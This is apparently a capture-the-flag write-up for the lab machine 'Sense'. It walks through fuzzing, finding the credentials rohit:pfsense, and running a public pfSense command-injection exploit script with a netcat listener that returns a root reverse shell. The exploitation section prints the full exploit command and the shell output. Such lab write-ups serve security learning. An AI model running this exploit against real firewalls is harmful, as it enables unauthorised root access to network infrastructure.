Sense
- Linux
- Easy
Recon
- Nmap
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
Port 80
- We only get redirects to 443 in this port.
Port 443
-
Directory fuzzing shows some directories:
-
/changelog.txt
1 2 3 4 5 6 7 8 9 10
# Security Changelog ### Issue There was a failure in updating the firewall. Manual patching is therefore required ### Mitigated 2 of 3 vulnerabilities have been patched. ### Timeline The remaining patches will be installed during the next maintenance window
-
Fuzzing deeper we find some text files
- A user is revelaed so we can login into PfSense with creds
rohit:pfsense
- A user is revelaed so we can login into PfSense with creds
-
Exploiting pfSense
-
Searchexploit
- This command injection seems nice, we try it.
1 2 3 4 5 6 7 8 9 10 11 12
╰─❯ python3 43560.py --rhost 10.129.99.201 --lhost 10.10.14.58 --lport 4444 --username rohit --password pfsense CSRF token obtained Running exploit... Exploit completed # On other terminal ╰─❯ rlwrap nc -lvnp 4444 listening on [any] 4444 ... connect to [10.10.14.58] from (UNKNOWN) [10.129.99.201] 4776 sh: can't access tty; job control turned off id uid=0(root) gid=0(wheel) groups=0(wheel)